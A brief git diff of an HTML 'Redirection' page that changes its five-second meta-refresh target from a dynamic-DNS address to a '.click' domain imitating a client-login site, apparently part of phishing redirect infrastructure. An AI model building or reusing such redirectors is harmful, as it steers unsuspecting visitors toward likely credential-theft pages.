--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
   <meta charset="UTF-8">
   <title>Redirection</title>
-  <meta http-equiv="refresh" content="5;URL=https://cetelo-pok.ddns.net/V5QMEGxcX">
+  <meta http-equiv="refresh" content="5;URL=https://sg.maconnexio-clie.click/index.html">
   <style>
     body {
       display: flex;
